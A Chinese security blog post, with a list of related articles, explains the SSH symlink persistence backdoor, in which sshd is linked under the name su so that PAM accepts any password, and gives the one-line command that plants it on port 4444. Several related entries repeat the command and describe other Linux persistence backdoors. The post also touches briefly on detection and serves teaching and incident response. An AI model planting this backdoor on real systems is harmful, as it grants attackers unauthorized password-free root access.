ssh软连接后门

最新推荐文章于 2024-05-07 08:31:17 发布
最新推荐文章于 2024-05-07 08:31:17 发布
阅读量530 收藏
点赞数
分类专栏: 网络安全 文章标签: linux web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_60719780/article/details/130634800
版权

ssh软连接后门

原理:

软连接后门的原理是利用了PAM配置文件的作用,将sshd文件软连接名称设置为su,这样应用在启动过程中会去PAM配置文件中寻找是否存在对应名称的配置信息(su),su在pam_rootok只检测uid 0 即认证成功,导致可以使用任意密码去登录。

ssh软连接后门实现:

被攻击机:

ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=4444

bd1f4035d3fc4ba6bb59c52817178c62.png

攻击机进行连接(密码这里可以任意输入):

d1a6c3242afb48efac234ce8af2a6b4a.png

成功登录!

ssh软连接后门检测响应:

f21e179aa74248e492e81d7348ab90d4.png

查看系统当前的端口状态:

938a45708507499389a1565e8d7c70fb.png

 

 

 

 

奋斗的小智
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Linux权限维持—OpenSSH&PAM后门&SSH软连接&公私钥登录
剁椒鱼头没剁椒的博客
08-22 2490
由于密码日志文件是被隐藏的,所以可以直接使用cat去查看,这里只要管理者使用ssh进行连接就会记录密码,而这些操作都是无感的,当然若管理员会去定期排查,那么该被发现还是会被发现的,这些都是基于管理员不会定期去排查才能够持久。这里要注意一个问题就是,不一定编译就能够成功,有时候根本无法编辑,从网上找的很多资料中,都跳过直接给命令,所以这里我就提前说一下,不一定能够编译成功,不成功再次重新测试,若还是不行,就拉到吧。这里重启也可能存在问题,这个实验有时候很莫名其妙的,有时候能够测试成功,有时候测试是不成功的。
ssh软链接后门
weixin_45261436的博客
05-26 308
利用了PAM配置文件的作用,将sshd文件软连接名称设置为su,这样应用在启动过程中他会去PAM配置文件夹中寻找是否存在对应名称的配置信息(su),然而 su 在 pam_rootok模块中使得 uid 为 0 可以直接通过认证而不需要输入密码,这样就导致了可以使用任意密码登录。如:我们的软链接文件为/tmp/su,那么应用就会找/etc/pam.d/su作为配置文件,那么则实现了无密登录。当我们通过特定的端口连接ssh后,应用在启动过程中就会去找到配置文件。出现的则可以用作软链接名称。
Linux常见后门(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Libra1313的博客
05-07 2138
Rootkit 是网络犯罪分子用来控制目标计算机或网络的软件。Rootkit 有时可以显示为单个软件,但通常由一系列工具组成,这些工具允许黑客对目标设备进行管理员级控制。黑客通过多种方式在目标计算机上安装 Rootkit:最常见的是通过网络钓鱼或其他类型的社会工程攻击。受害者在不知不觉中下载并安装隐藏在计算机上运行的其他进程中的恶意软件,并让黑客控制操作系统的几乎所有方面。另一种方法是利用漏洞(即软件或未更新的操作系统中的弱点)并将 Rootkit 强制安装到计算机上。
通过SSH后门(创建ssh软链接)
songling515010475的专栏
05-10 2199
一、判断sshd_config配置中的UsePAM参数是否为yes cat /etc/ssh/sshd_config 二、确认对应的pam配置文件是否包含auth sufficient pam_rootok.so配置,只在包含这件配置才可以通过ssh任意密码登录。 三、通过命令创建后门软链接,通过查看端口己监听。 ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=12345 netstat -antlp 四、通过另一台机器ssh进行任意密码登
SSH软连接后门
weixin_45209228的博客
03-13 347
SSH软连接后门
ssh后门介绍与防御
有勇气的牛排博客
08-04 1501
文章目录1 介绍2 实战演练2.1 查看版本2.2 下载SSH配置文件2.3 安装2.4 修改后门密码and文件记录2.5 编译安装2.6 摸出痕迹3 防御ssh后门 1 介绍 当拿到root权限后,一般需要维持权限(留后门),可以做openssh后门,也就是root双密码,管理员一个密码,我们的后门一个密码。 2 实战演练 实验环境:Centos7 2.1 查看版本 ssh -v 可以对ssh备份配置文件,可以对后期的文件时间进行修改 cp -p /etc/ssh/ssh_config / etc/
Linux常见的持久化后门汇总1
08-03
1、Linux软连接ssh后门需要ssh配置允许PAM认证才能使用 2、将sshd文件软连接名称设置为su,这样应用在启动过程中他会去PAM配置文件夹中寻找是否
putty远程工具ssh、telnet等
12-24
总结来说,PuTTY作为一款强大的远程连接工具,提供了SSH和Telnet两种方式,满足了不同场景下的远程访问需求。了解并熟练使用PuTTY,对于日常的系统管理、网络调试以及服务器维护等工作具有重要意义。而安全意识的...
SSH Protocol Handler-开源
04-24
总结起来,SSH Protocol Handler是一个实用的工具,它利用SSH协议的安全特性,结合开源软件的精神,为用户提供了一种便捷、定制化的远程连接方式。通过整合PuTTY这样的经典SSH客户端,它增强了Windows操作系统的功能...
KpyM Telnet / SSH服务器-开源
04-13
总之,KpyM Telnet / SSH服务器是Windows环境下的一个强大工具,它为用户提供了一种安全的远程访问方式。开源的特性使得它更具吸引力,用户可以自由地定制和优化以满足特定需求。正确配置和使用这个服务器软件,不仅...
Reverse_SSH_Shell:用python编写的反向ssh外壳,供渗透测试人员用作Windows上的隐蔽通道
05-03
在这个过程中,反向SSH外壳能够帮助测试者在目标系统上建立一个后门,从而实现远程控制,而这种控制方式往往不易被检测到。 首先,理解什么是反向SSH外壳。通常,SSH(Secure Shell)是一种加密的网络协议,用于在...
SSH连接工具
02-12
SSH连接工具,windows与linux互传文件,可视化操作很方便。
SSH软链接后门利用和原理
Jeeseen123的博客
08-23 1297
SSH软链接后门利用和原理 本文由锦行科技的安全研究团队提供,主要介绍SSH软连接后门的利用和相关原理。 00 利用前提 ssh配置中开启了PAM进行身份验证 查看是否使用PAM进行身份验证:cat/etc/ssh/sshd_config|grep UsePAM 01 建立后门 建立软连接后门:ln-sf/usr/sbin/sshd/tmp/su;/tmp/su-oPort=1234 注意:软链接的路径不是绝对的,但名字不是随便命名的,使用命令find/etc/pam.d|xargs grep "pam_r
LINUX后门--教程(二)—— SSH软链接后门
W小哥
06-02 4621
一、本教程作用 1、用在攻击的途径上 2、应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急? 不知攻,焉知防 二、添加SSH后门-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限 环境: 一台开启ssh的任意Linux服务器就可以(我用的虚拟机) ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337 ...
利用iptable实现ssh端口复用后门
qq_68163788的博客
11-20 1366
Linux系统中,可以使用iptables来实现SSH端口复用后门SSH端口复用后门是一种隐藏在SSH服务中的后门,可以通过修改iptables规则来实现。 首先,需要确保iptables已经安装在系统中。上面的命令中,是指定的用于后门的端口号,是原本的SSH服务端口号。 接下来,需要修改SSH配置文件,将监听端口改为新的端口号。打开SSH配置文件(通常是/etc/ssh/sshd_config),找到Port项,并将原本的SSH端口号改为新的端口号。
安全狗】Linux后渗透常见后门驻留方式分析
bocco的博客
11-02 596
当RedTeam拿下了一台服务器并获取到系统较高权限,但不知道服务器的凭证时,RedTeam会采用怎样的技术获取系统凭证呢?又或者,在RedTeam拿下一台服务器,为达到长久控制的目的而专门定制持久化后门(免杀肯定是必须的)的前提下,他们会如何结合系统自身的某些特性,达到持久化控制的效果?
安全研究】Linux后渗透常见后门驻留方式分析
weixin_49128886的博客
11-09 1361
Linux后渗透常见后门驻留方式分析
操作系统权限维持(八)之Linux系统-SSHKey后门
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-27 759
当我们具有写入权限的时候,我们同样可以自行生成密钥,当kali机器第一次生成密钥的时候,并且把公钥放在了你的服务器上面,当你把公钥放在服务器上面的时候,这就意味着他可以正常的解密和加密你发过来的内容,后面你就是通过加解密去认证会话的,并不需要输入密码。将 id_rsa.pub文件中的内容拷贝到目标机器上并且写入到 authorized_keys这个文件夹下。现在我们不需要密码就能连接目标机器了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值